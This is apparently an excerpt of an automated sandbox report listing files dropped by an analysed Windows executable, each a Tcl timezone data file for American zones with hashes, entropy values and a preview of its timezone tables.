Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Indiana/Tell_City) {. {-9223372036854775808 -20823 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-757360800 -21600 0 CST}. {-747244800 -18000 1 CDT}. {-733942800 -21600 0 CST}. {-526492800 -18000 1 CDT}. {-513190800 -21600 0 CST}. {-495043200 -18000 1 CDT}. {-481741200 -21600 0 CST}. {-462996000 -18000 1 CDT}. {-450291600 -21600 0 CST}. {-431539200 -18000 1 CDT}. {-418237200 -21600 0 CST}. {-400089600 -18000 1 CDT}. {-386787600 -21600 0 CST}. {-368640000 -18000 1 CDT}. {-355338000 -21600 0 CST}. {-337190400 -18000 1 CDT}. {-323888400 -21600 0 CST}. {-305740800 -18000 1 CDT}. {-289414800 -21600 0 CST}. {-273686400 -18000 1 CDT}. {-260989200 -21600 0 CST}

C:\Users\user\Desktop\tcl\tzdata\America\Indiana\Vevay Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6350
Entropy (8bit):	3.782861360101505
Encrypted:	false
SSDEEP:	96:K9Xx3+lsHRwvOTFhP5S+ijFnRaJeaX1eyDt:6XxuoqvOTFhPI1jFIL
MD5:	35A64C161E0083DCE8CD1E8E1D6EBE85
SHA1:	9BC295C23783C07587D82DA2CC25C1A4586284B2
SHA-256:	75E89796C6FB41D75D4DDA6D94E4D27979B0572487582DC980575AF6656A7822
SHA-512:	7BAF735DA0DE899653F60EED6EEF53DD8A1ABC6F61F052B8E37B404BC9B37355E94563827BC296D8E980C4247864A57A117B7B1CB58A2C242991BBDC8FE7174E
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Indiana/Vevay) {. {-9223372036854775808 -20416 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-495043200 -18000 0 EST}. {-31518000 -18000 0 EST}. {-21488400 -14400 1 EDT}. {-5767200 -18000 0 EST}. {9961200 -14400 1 EDT}. {25682400 -18000 0 EST}. {41410800 -14400 1 EDT}. {57736800 -18000 0 EST}. {73465200 -14400 1 EDT}. {89186400 -18000 0 EST}. {94712400 -18000 0 EST}. {1136091600 -18000 0 EST}. {1143961200 -14400 1 EDT}. {1162101600 -18000 0 EST}. {1173596400 -14400 1 EDT}. {1194156000 -18000 0 EST}. {1205046000 -14400 1 EDT}. {1225605600 -18000 0 EST}. {1236495600 -14400 1 EDT}. {1257055200 -18000 0 EST}. {1268550000 -14400 1 EDT}. {1289109600 -18000

C:\Users\user\Desktop\tcl\tzdata\America\Indiana\Vincennes Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6992
Entropy (8bit):	3.795913753683276
Encrypted:	false
SSDEEP:	192:TXxjL36559B2XI6XE3X3D2E0baqvOTFhPI1jFIL:TXxjL36559B2XI6XE3X3D2E0bZ3+
MD5:	AD8B44BD0DBBEB06786B2B281736A82B
SHA1:	7480D3916F0ED66379FC534F20DC31001A3F14AF
SHA-256:	18F35F24AEF9A937CD9E91E723F611BC5D802567A03C5484FAB7AEEC1F2A0ED0
SHA-512:	7911EC3F1FD564C50DEAF074ED99A502A9B5262B63E3E0D2901E21F27E90FBD5656A53831E61B43A096BA1FF18BB4183CCCE2B903782C2189DAAFDD7A90B3083
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Indiana/Vincennes) {. {-9223372036854775808 -21007 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-757360800 -21600 0 CST}. {-747244800 -18000 1 CDT}. {-733942800 -21600 0 CST}. {-526492800 -18000 1 CDT}. {-513190800 -21600 0 CST}. {-495043200 -18000 1 CDT}. {-481741200 -21600 0 CST}. {-462996000 -18000 1 CDT}. {-450291600 -21600 0 CST}. {-431539200 -18000 1 CDT}. {-418237200 -21600 0 CST}. {-400089600 -18000 1 CDT}. {-386787600 -21600 0 CST}. {-368640000 -18000 1 CDT}. {-355338000 -21600 0 CST}. {-337190400 -18000 1 CDT}. {-323888400 -21600 0 CST}. {-305740800 -18000 1 CDT}. {-289414800 -21600 0 CST}. {-273686400 -18000 1 CDT}. {-260989200 -21600 0 CST}

C:\Users\user\Desktop\tcl\tzdata\America\Indiana\Winamac Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7170
Entropy (8bit):	3.7942292979267767
Encrypted:	false
SSDEEP:	192:YXxjJ2eQzURWu3Oab9B2XWR0/qvOTFhPI1jFIL:YXxjJ2eQzUwu3Oab9B2XWR0M3+
MD5:	40D8E05D8794C9D11DF018E3C8B8D7C0
SHA1:	58161F320CB46EC72B9AA6BAD9086F18B2E0141B
SHA-256:	A13D6158CCD4283FE94389FD341853AD90EA4EC505D37CE23BD7A6E7740F03F6
SHA-512:	BC45B6EFF1B879B01F517D4A4012D0AFBA0F6A9D92E862EF9A960FE07CBE216C8C929FE790044C566DC95981EC4BEAB3DCBD45A1FE597606CF601214A78AEA08
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Indiana/Winamac) {. {-9223372036854775808 -20785 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-757360800 -21600 0 CST}. {-747244800 -18000 1 CDT}. {-733942800 -21600 0 CST}. {-715795200 -18000 1 CDT}. {-702493200 -21600 0 CST}. {-684345600 -18000 1 CDT}. {-671043600 -21600 0 CST}. {-652896000 -18000 1 CDT}. {-639594000 -21600 0 CST}. {-620841600 -18000 1 CDT}. {-608144400 -21600 0 CST}. {-589392000 -18000 1 CDT}. {-576090000 -21600 0 CST}. {-557942400 -18000 1 CDT}. {-544640400 -21600 0 CST}. {-526492800 -18000 1 CDT}. {-513190800 -21600 0 CST}. {-495043200 -18000 1 CDT}. {-481741200 -21600 0 CST}. {-463593600 -18000 1 CDT}. {-447267600 -21600 0 CST}.

C:\Users\user\Desktop\tcl\tzdata\America\Indianapolis Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	228
Entropy (8bit):	4.655121947675421
Encrypted:	false
SSDEEP:	6:SlSWB9IZaM3y73GK7mFVAIgp3GKBL2903GfJ4903GK1:MBaIMY3GK7Hp3GKBL2903GfJ4903GK1
MD5:	CB79BE371FAB0B0A5EBEB1BA101AA8BA
SHA1:	6A24348AB24D6D55A8ABDEE1500ED03D5D1357F3
SHA-256:	6AABF28AC5A766828DD91F2EE2783F50E9C6C6307D8942FCD4DFAE21DB2F1855
SHA-512:	156E1E7046D7A0938FE4BF40BC586F0A7BEF1B0ED7B887665E9C6041980B511F079AA739B7BD42A89794CB9E82DB6629E81DD39D2F8161DFABDED539E272FB6E
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Indiana/Indianapolis)]} {. LoadTimeZoneFile America/Indiana/Indianapolis.}.set TZData(:America/Indianapolis) $TZData(:America/Indiana/Indianapolis).

C:\Users\user\Desktop\tcl\tzdata\America\Inuvik Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7389
Entropy (8bit):	3.78271920608107
Encrypted:	false
SSDEEP:	96:/YGm+4I1zXN+C2mWBNQMsmNTxf6AeO+cblX:/JVUC2mWBNwWTxyWR
MD5:	EA93F2A5DE3CED689C8A9664E31D9174
SHA1:	EF81F6A41767084F8C8DC629E0C084C947DA3E2A
SHA-256:	8892A520B306C18A55B2114E1EC9514263F818801D8A0C3A9B8C6E4345B73A0E
SHA-512:	5A237535A8C875D9E734D4A37DA3DB1B1ED86DB407E9E741E1EF241697B9314BA6A3C934227B6D776168C324EC1EE3C939DF1BEB2540342A502AA78DB0E97020
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Inuvik) {. {-9223372036854775808 0 0 zzz}. {-536457600 -28800 0 PST}. {-147888000 -21600 1 PDDT}. {-131558400 -28800 0 PST}. {315558000 -25200 0 MST}. {325674000 -21600 1 MDT}. {341395200 -25200 0 MST}. {357123600 -21600 1 MDT}. {372844800 -25200 0 MST}. {388573200 -21600 1 MDT}. {404899200 -25200 0 MST}. {420022800 -21600 1 MDT}. {436348800 -25200 0 MST}. {452077200 -21600 1 MDT}. {467798400 -25200 0 MST}. {483526800 -21600 1 MDT}. {499248000 -25200 0 MST}. {514976400 -21600 1 MDT}. {530697600 -25200 0 MST}. {544611600 -21600 1 MDT}. {562147200 -25200 0 MST}. {576061200 -21600 1 MDT}. {594201600 -25200 0 MST}. {607510800 -21600 1 MDT}. {625651200 -25200 0 MST}. {638960400 -21600 1 MDT}. {657100800 -25200 0 MST}. {671014800 -21600 1 MDT}. {688550400 -25200 0 MST}. {702464400 -21600 1 MDT}. {720000000 -25200 0 MST}. {733914000 -

C:\Users\user\Desktop\tcl\tzdata\America\Iqaluit Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7421
Entropy (8bit):	3.7514030267117118
Encrypted:	false
SSDEEP:	96:b/GC3XmzdsHRwvOTFhP5S+ijFnRaJeaX1eyDt:b/Pn0gqvOTFhPI1jFIL
MD5:	A9A59966C4F90AEE45E5DBE2FAFD6ACF
SHA1:	FFFE0614CFEE9477311943211DA6A8988E7381F1
SHA-256:	356CA4C5D302EB72566254E58CE6570C45EB1399C8CC2B4CE0369778B10E9329
SHA-512:	FD62119A86EEC7CFFF0F9179BF7C4DFD0BC4A6CF46D79349821DEFECB4E0FD20DAECBE7F038B0EA1694DADA8F0087E2AFC0E4D6F81DFF26586719FEEC9E461F0
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Iqaluit) {. {-9223372036854775808 0 0 zzz}. {-865296000 -14400 0 EWT}. {-769395600 -14400 1 EPT}. {-765396000 -18000 0 EST}. {-147898800 -10800 1 EDDT}. {-131569200 -18000 0 EST}. {325666800 -14400 1 EDT}. {341388000 -18000 0 EST}. {357116400 -14400 1 EDT}. {372837600 -18000 0 EST}. {388566000 -14400 1 EDT}. {404892000 -18000 0 EST}. {420015600 -14400 1 EDT}. {436341600 -18000 0 EST}. {452070000 -14400 1 EDT}. {467791200 -18000 0 EST}. {483519600 -14400 1 EDT}. {499240800 -18000 0 EST}. {514969200 -14400 1 EDT}. {530690400 -18000 0 EST}. {544604400 -14400 1 EDT}. {562140000 -18000 0 EST}. {576054000 -14400 1 EDT}. {594194400 -18000 0 EST}. {607503600 -14400 1 EDT}. {625644000 -18000 0 EST}. {638953200 -14400 1 EDT}. {657093600 -18000 0 EST}. {671007600 -14400 1 EDT}. {688543200 -18000 0 EST}. {702457200 -14400 1 EDT}. {71999280

C:\Users\user\Desktop\tcl\tzdata\America\Jamaica Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	789
Entropy (8bit):	4.1553379694786745
Encrypted:	false
SSDEEP:	24:cQ1eiL0/XIp/uJD/u2lR/utzN54i/uhU/ufUF5/uDBq/u63gU/u3Zh/u4u8H:5/CIgxmzfwuFqBG3g/k8H
MD5:	FB678391730740C7E72C276568728694
SHA1:	6E34D42DADD1923C4B27D8404A83B66798B344E6
SHA-256:	D073E0961CFE467EBD2AE0D3D52C300663C187F483B32851FFF8F6F5B3A16BA9
SHA-512:	64469508633E96228C20A06221B45651923CB6FFBBCC6B9534B4609757483A2D8E1F2B81929D444DA24345D01F9C4D1D60269836536420F226105F6B5C49DC28
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Jamaica) {. {-9223372036854775808 -18432 0 LMT}. {-2524503168 -18432 0 KMT}. {-1827687168 -18000 0 EST}. {136364400 -14400 0 EDT}. {152085600 -18000 0 EST}. {162370800 -14400 1 EDT}. {183535200 -18000 0 EST}. {199263600 -14400 1 EDT}. {215589600 -18000 0 EST}. {230713200 -14400 1 EDT}. {247039200 -18000 0 EST}. {262767600 -14400 1 EDT}. {278488800 -18000 0 EST}. {294217200 -14400 1 EDT}. {309938400 -18000 0 EST}. {325666800 -14400 1 EDT}. {341388000 -18000 0 EST}. {357116400 -14400 1 EDT}. {372837600 -18000 0 EST}. {388566000 -14400 1 EDT}. {404892000 -18000 0 EST}. {420015600 -14400 1 EDT}. {436341600 -18000 0 EST}. {441781200 -18000 0 EST}.}.

C:\Users\user\Desktop\tcl\tzdata\America\Jujuy Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	206
Entropy (8bit):	4.89710274358395
Encrypted:	false
SSDEEP:	6:SlSWB9IZaM3y7/MI1VAIgp/MI+290pPGe90/MIE:MBaIMY/Mvp/Mh290h390/MB
MD5:	320C83EFE59FD60EB9F5D4CF0845B948
SHA1:	5A71DFAE7DF9E3D8724DFA533A37744B9A34FFEC
SHA-256:	67740B2D5427CFCA70FB53ABD2356B62E01B782A51A805A324C4DFAD9ACA0CFA
SHA-512:	D7A6378372386C45C907D3CB48B923511A719794B0C0BFA3694DBCE094A46A48249720653836C2F10CBB2178DD8EEEEA6B5019E4CC6C6B650FD7BE256BE1CA99
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Argentina/Jujuy)]} {. LoadTimeZoneFile America/Argentina/Jujuy.}.set TZData(:America/Jujuy) $TZData(:America/Argentina/Jujuy).

C:\Users\user\Desktop\tcl\tzdata\America\Juneau Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8406
Entropy (8bit):	3.882476905033879
Encrypted:	false
SSDEEP:	96:JZL19jPaps/Q7Ddh5sBPyNsSLFOMM/EowALVZVmWa86Eac8rQ:fB9jPP/4h5sBPy+CMt/ElALLVuAH
MD5:	C2C6145B7E41983259343FFE5992EA35
SHA1:	467D9EBCF3F0A5FC5B03F662A606125F5C10692F
SHA-256:	189658620FE07CF20EEABCD3968A9C1A497576F83592C9622D964E48FC4E9A51
SHA-512:	41C791BF2885B5C0ED7DE5DB1B34B22F67C699C0E3248563DAA8DAEE92E2D02168F6CC21DE6D1B3EDEFC71E6FDFD09AEDB1D768A8435583C14FACCA59CF1C686
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Juneau) {. {-9223372036854775808 54139 0 LMT}. {-3225366139 -32261 0 LMT}. {-2188954939 -28800 0 PST}. {-883584000 -28800 0 PST}. {-880207200 -25200 1 PWT}. {-769395600 -25200 1 PPT}. {-765385200 -28800 0 PST}. {-757353600 -28800 0 PST}. {-31507200 -28800 0 PST}. {-21477600 -25200 1 PDT}. {-5756400 -28800 0 PST}. {9972000 -25200 1 PDT}. {25693200 -28800 0 PST}. {41421600 -25200 1 PDT}. {57747600 -28800 0 PST}. {73476000 -25200 1 PDT}. {89197200 -28800 0 PST}. {104925600 -25200 1 PDT}. {120646800 -28800 0 PST}. {126698400 -25200 1 PDT}. {152096400 -28800 0 PST}. {162381600 -25200 1 PDT}. {183546000 -28800 0 PST}. {199274400 -25200 1 PDT}. {215600400 -28800 0 PST}. {230724000 -25200 1 PDT}. {247050000 -28800 0 PST}. {262778400 -25200 1 PDT}. {278499600 -28800 0 PST}. {294228000 -25200 1 PDT}. {309949200 -28800 0 PST}. {325677600

C:\Users\user\Desktop\tcl\tzdata\America\Kentucky\Louisville Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	9332
Entropy (8bit):	3.769996646995791
Encrypted:	false
SSDEEP:	192:wmXxSkUArUfxLURWu3O5bMQxXI6Xah0drn+qvOTFhPI1jFIL:wmXxSkUArUfxLUwu3O5bMQxXI6Xah2n8
MD5:	D9BC20AFD7DA8643A2091EB1A4B48CB3
SHA1:	9B567ABF6630E7AB231CAD867AD541C82D9599FF
SHA-256:	B4CC987A6582494779799A32A9FB3B4A0D0298425E71377EB80E2FB4AAAEB873
SHA-512:	0BC769A53E63B41341C25A0E2093B127064B589F86483962BD24DB4082C4466E12F4CD889B82AD0134C992E984EF0897113F28321522B57BA45A98C15FF7E172
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Kentucky/Louisville) {. {-9223372036854775808 -20582 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-1546279200 -21600 0 CST}. {-1535904000 -18000 1 CDT}. {-1525280400 -21600 0 CST}. {-905097600 -18000 1 CDT}. {-891795600 -21600 0 CST}. {-883591200 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-757360800 -21600 0 CST}. {-747244800 -18000 1 CDT}. {-744224400 -21600 0 CST}. {-715795200 -18000 1 CDT}. {-684349200 -18000 1 CDT}. {-652899600 -18000 1 CDT}. {-620845200 -18000 1 CDT}. {-608144400 -21600 0 CST}. {-589392000 -18000 1 CDT}. {-576090000 -21600 0 CST}. {-557942400 -18000 1 CDT}. {-544640400 -21600 0 CST}. {-526492800 -18000 1 CDT}. {-513190800 -21600 0 CST}. {-495043200 -18000 1

C:\Users\user\Desktop\tcl\tzdata\America\Kentucky\Monticello Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8279
Entropy (8bit):	3.785637200740036
Encrypted:	false
SSDEEP:	192:jFPXxEOdXkqbfkeTzZSJw5/9/yuvQ+hcrD57X0N41+gqvOTFhPI1jFIL:5PXxEOdXkqbfNTzZSJw5/9/yuvQ6crD9
MD5:	0C6F5C9D1514DF2D0F8044BE27080EE2
SHA1:	70CBA0561E4319027C60FB0DCF29C9783BFE8A75
SHA-256:	1515460FBA496FE8C09C87C51406F4DA5D77C11D1FF2A2C8351DF5030001450F
SHA-512:	17B519BCC044FE6ED2F16F2DFBCB6CCE7FA83CF17B9FC4A40FDA21DEFBA9DE7F022A50CF5A264F3090D57D51362662E01C3C60BD125430AEECA0887BB8520DB1
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Kentucky/Monticello) {. {-9223372036854775808 -20364 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-757360800 -21600 0 CST}. {-63136800 -21600 0 CST}. {-52934400 -18000 1 CDT}. {-37213200 -21600 0 CST}. {-21484800 -18000 1 CDT}. {-5763600 -21600 0 CST}. {9964800 -18000 1 CDT}. {25686000 -21600 0 CST}. {41414400 -18000 1 CDT}. {57740400 -21600 0 CST}. {73468800 -18000 1 CDT}. {89190000 -21600 0 CST}. {104918400 -18000 1 CDT}. {120639600 -21600 0 CST}. {126691200 -18000 1 CDT}. {152089200 -21600 0 CST}. {162374400 -18000 1 CDT}. {183538800 -21600 0 CST}. {199267200 -18000 1 CDT}. {215593200 -21600 0 CST}. {230716800 -18000 1 CDT}. {247042800 -21600 0 C

C:\Users\user\Desktop\tcl\tzdata\America\Knox_IN Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	199
Entropy (8bit):	4.8191308888643345
Encrypted:	false
SSDEEP:	6:SlSWB9IZaM3y73GKXFVAIgp3GK4N2901iZ903GKk:MBaIMY3GKXQp3GKe290Q903GKk
MD5:	465D405C9720EB7EC4BB007A279E88ED
SHA1:	7D80B8746816ECF4AF45166AED24C731B60CCFC6
SHA-256:	BE85C86FBD7D396D2307E7DCC945214977829E1314D1D71EFAE509E98AC15CF7
SHA-512:	C476022D2CC840793BF7B5841051F707A30CCAB1022E30FB1E45B420077417F517BEDA5564EFB154283C7C018A9CA09D10845C6A1BFE2A2DE7C939E307BDCE6F
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Indiana/Knox)]} {. LoadTimeZoneFile America/Indiana/Knox.}.set TZData(:America/Knox_IN) $TZData(:America/Indiana/Knox).

C:\Users\user\Desktop\tcl\tzdata\America\Kralendijk Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	187
Entropy (8bit):	4.810917109656368
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqx09CvjHVAIg209CvjvQ2IAcGE1QOa0IAcGE9Cvju:SlSWB9IZaM3y79CzVAIgp9CE2901Qv0k
MD5:	4763D6524D2D8FC62720BCD020469FF6
SHA1:	EE567965467E4F3BDFE4094604E526A49305FDD8
SHA-256:	A794B43E498484FFD83702CFB9250932058C01627F6F6F4EE1432C80A9B37CD6
SHA-512:	37462E0A3C24D5BAEBDD1ADCF8EE94EA07682960D710D57D5FD05AF9C5F09FF30312528D79516A16A0A84A2D351019DBB33308FC39EC468033B18FB0AC872C13
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Curacao)]} {. LoadTimeZoneFile America/Curacao.}.set TZData(:America/Kralendijk) $TZData(:America/Curacao).

C:\Users\user\Desktop\tcl\tzdata\America\La_Paz Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	211
Entropy (8bit):	4.906725349443972
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52IAcGEyUMWkXGm2OHpJvvvX+nFp1vZSsXxymxvUmBXlVvxC:SlSWB9X5290Xm2OHphvPKZpydmBVVI
MD5:	6682484C3A44609C949CA050DF75F9F0
SHA1:	6BCFA42D53F55FE7D9F12533C0E79B0C6D3F9BF2
SHA-256:	1476CDDA7BBDD80542FE7EE81516511C47B2CDA336D7290D7329C43D43CE90BB
SHA-512:	5B5FB9CF6E156B058CCDEBEC4C3A1941D7F5AF59C4AB00FDE5ACBD71A1D006960D7A151BF575349DC961AE4CADA8406080C77281AA5960338374882FF38FF4AF
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/La_Paz) {. {-9223372036854775808 -16356 0 LMT}. {-2524505244 -16356 0 CMT}. {-1205954844 -12756 1 BOST}. {-1192307244 -14400 0 BOT}.}.

C:\Users\user\Desktop\tcl\tzdata\America\Lima Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	447
Entropy (8bit):	4.3934794282318315
Encrypted:	false
SSDEEP:	12:MBp5290BbmdH4VPvut/Na/k0QXR/uFmC3/kFe/uFis/kZ/kkF/k88/kUS1F5/kL:cQye8mVNa85R/uH8o/u4s8Z8O8V8USPS
MD5:	8B7AA48D355E4DFCA5F70CF5D6EF7757
SHA1:	817CDC27C7CB4642A7BD3239506ECAECB1852815
SHA-256:	893146B4F7521C089A22354A8314812736AAF8C64DFF0364A1083A4181BDEA48
SHA-512:	38E2FC1774718BC10EB1440DDCE83310262086D14DA17E157873B86814EFCDB047687F05D44B168206AE752ADAC5BF2E78FDD3676B7CC65D0144B0869F1E9481
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Lima) {. {-9223372036854775808 -18492 0 LMT}. {-2524503108 -18516 0 LMT}. {-1938538284 -14400 0 PEST}. {-1002052800 -18000 0 PET}. {-986756400 -14400 1 PEST}. {-971035200 -18000 0 PET}. {-955306800 -14400 1 PEST}. {-939585600 -18000 0 PET}. {512712000 -18000 0 PET}. {544248000 -18000 0 PET}. {638942400 -18000 0 PET}. {765172800 -18000 0 PET}.}.

C:\Users\user\Desktop\tcl\tzdata\America\Los_Angeles Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	9409
Entropy (8bit):	3.765996600201645
Encrypted:	false
SSDEEP:	192:lWf/5LB6xN9jgNf+aNwj/lpmlOxnKcndIG:lW35LB6xN9wfefnK6
MD5:	3647C4B5DEE91CF5D9F69683719A0DE1
SHA1:	99A2399CA36C06F80094875EE6EE505A2347D0B0
SHA-256:	C4E241FED91FA8CA0AE3DD44528BB962FC86F505865BABD2FD5621B9FAE3AE12
SHA-512:	051FC88881E21BC1B1BE22410A16A79F122051D5DA7FF24E9A01D1265960058827E814BFFE51B9592F2186E57305B6259A81064A006247973F26EFE949D6ACCF
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Los_Angeles) {. {-9223372036854775808 -28378 0 LMT}. {-2717640000 -28800 0 PST}. {-1633269600 -25200 1 PDT}. {-1615129200 -28800 0 PST}. {-1601820000 -25200 1 PDT}. {-1583679600 -28800 0 PST}. {-880207200 -25200 1 PWT}. {-769395600 -25200 1 PPT}. {-765385200 -28800 0 PST}. {-757353600 -28800 0 PST}. {-687967200 -25200 1 PDT}. {-662655600 -28800 0 PST}. {-620834400 -25200 1 PDT}. {-608137200 -28800 0 PST}. {-589384800 -25200 1 PDT}. {-576082800 -28800 0 PST}. {-557935200 -25200 1 PDT}. {-544633200 -28800 0 PST}. {-526485600 -25200 1 PDT}. {-513183600 -28800 0 PST}. {-495036000 -25200 1 PDT}. {-481734000 -28800 0 PST}. {-463586400 -25200 1 PDT}. {-450284400 -28800 0 PST}. {-431532000 -25200 1 PDT}. {-418230000 -28800 0 PST}. {-400082400 -25200 1 PDT}. {-386780400 -28800 0 PST}. {-368632800 -25200 1 PDT}. {-355330800 -28800 0 PST}. {

C:\Users\user\Desktop\tcl\tzdata\America\Louisville Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	223
Entropy (8bit):	4.866250035215905
Encrypted:	false
SSDEEP:	6:SlSWB9IZaM3y71PiKp4ozFVAIgp1PiKp4zL290hp4901PiKp4/:MBaIMYPyJpPyzL290P490Py/
MD5:	3BAD2D8B6F2ECB3EC0BFA16DEAEBADC3
SHA1:	2E8D7A5A29733F94FF247E7E62A7D99D5073AFDC
SHA-256:	242870CE8998D1B4E756FB4CD7097FF1B41DF8AA6645E0B0F8EB64AEDC46C13C
SHA-512:	533A6A22A11C34BCE3772BD85B6A5819CCCD98BF7ECED9E751191E5D1AD3B84F34D70F30936CFE501C2FA3F6AAC7ABB9F8843B7EB742C6F9C2AD4C22D5C73740
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Kentucky/Louisville)]} {. LoadTimeZoneFile America/Kentucky/Louisville.}.set TZData(:America/Louisville) $TZData(:America/Kentucky/Louisville).

C:\Users\user\Desktop\tcl\tzdata\America\Lower_Princes Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	190
Entropy (8bit):	4.81236985301262
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqx09CvjHVAIg209CvjvQ2IAcGEyOqdVM1h4IAcGE9Cva:SlSWB9IZaM3y79CzVAIgp9CE290h48hf
MD5:	EBB062CC0AA5C21F7C4278B79B9EAE6C
SHA1:	6DFC8303BBE1FB990D7CB258E7DBC6270A5CFE64
SHA-256:	4842420076033349DD9560879505326FFAB91BED75D6C133143FFBBFB8725975
SHA-512:	5087C6257CA797317D049424324F5DC31BBD938436DCEB4CF4FE3D2520F7745F1C023E3EC48689957E389900EF2AACB3F5E9E49FD154DF51FF89F9A7173818CD
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Curacao)]} {. LoadTimeZoneFile America/Curacao.}.set TZData(:America/Lower_Princes) $TZData(:America/Curacao).

C:\Users\user\Desktop\tcl\tzdata\America\Maceio Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1507
Entropy (8bit):	3.958253749053277
Encrypted:	false
SSDEEP:	24:cQGEekqc+Ih+j+Dd+HO+W+iW+M+A+ph+h/1+ge5+Wt+x3+evIG+M+w+T+v+F+w+m:5NP+Ih+j+R+u+W+iW+M+A+r+hN+gU+Wp
MD5:	9823A3BC9616E044820930E13097868D
SHA1:	F672D334FC77CC693FD358E9D5D9F498DD5675DA
SHA-256:	ACF6164AF86348F33ABB16E0961EF5291EF8DFEB23524CCDD2DB021A2BF5DE8F
SHA-512:	BA9B86318C714DA49CC957C65B24257C65185BBCB5BCDC017D918E563711770151D9DA69B5CC8D06F8290F844B396ED4A5416BD5247A8BF772D287D1E292EE4B
Malicious:	false
